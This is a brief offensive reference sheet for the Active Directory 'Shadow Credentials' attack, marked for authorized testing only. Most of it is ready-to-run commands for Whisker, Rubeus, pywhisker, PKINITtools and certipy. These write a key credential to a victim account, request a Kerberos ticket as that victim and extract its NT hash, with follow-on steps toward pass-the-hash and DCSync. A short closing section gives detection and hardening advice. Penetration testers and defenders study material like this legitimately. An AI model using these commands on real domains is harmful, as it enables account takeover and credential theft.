SHADOW-CREDENTIALS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Abuse Key Trust (PKINIT) by writing a certificate to a target's msDS-KeyCredentialLink, then authenticating as them with Kerberos. A stealthy alternative to resetting passwords. Requires write access to the target object. Authorized engagements only.
PREREQUISITES#
- GenericWrite / GenericAll / WriteProperty over the target user or computer (find via BloodHound: "AddKeyCredentialLink" edge). - DC running on Server 2016+ with PKINIT (AD CS not strictly required).
WINDOWS (Whisker + Rubeus)#
Whisker.exe add /target:victim$ # adds a KeyCredential, prints cmd # Whisker outputs a Rubeus asktgt with the generated cert: Rubeus.exe asktgt /user:victim$ /certificate:<b64> /password:"<pfxpw>" /ptt # then act as victim: Rubeus.exe asktgt /user:victim$ /certificate:... /getcredentials # also NT hash Clean up: Whisker.exe remove /target:victim$ /deviceid:<guid> Whisker.exe list /target:victim$
LINUX (pywhisker + PKINITtools / certipy)#
pywhisker.py -d corp.local -u attacker -p pass --target victim --action add # -> outputs a .pfx and its password # Get a TGT via PKINIT: gettgtpkinit.py -cert-pfx victim.pfx -pfx-pass <pw> corp.local/victim victim.ccache export KRB5CCNAME=victim.ccache # Recover the NT hash from the PAC (U2U): getnthash.py -key <AS-REP key from gettgtpkinit> corp.local/victim # certipy all-in-one: certipy shadow auto -u attacker@corp.local -p pass -account victim
WHY IT'S USEFUL#
- No password reset (less disruptive / noisy than forcechangepassword). - Yields a usable TGT and often the NT hash (chains to PtH, DCSync if privileged). - Works on computer accounts (pair with RBCD / coercion).
DETECTION / HARDENING (blue-team note)#
- Monitor changes to msDS-KeyCredentialLink (DS object auditing / 5136). - Tighten DACLs: remove excessive GenericWrite/GenericAll over Tier-0. - Enforce strong certificate mapping; review AD CS and Key Trust config.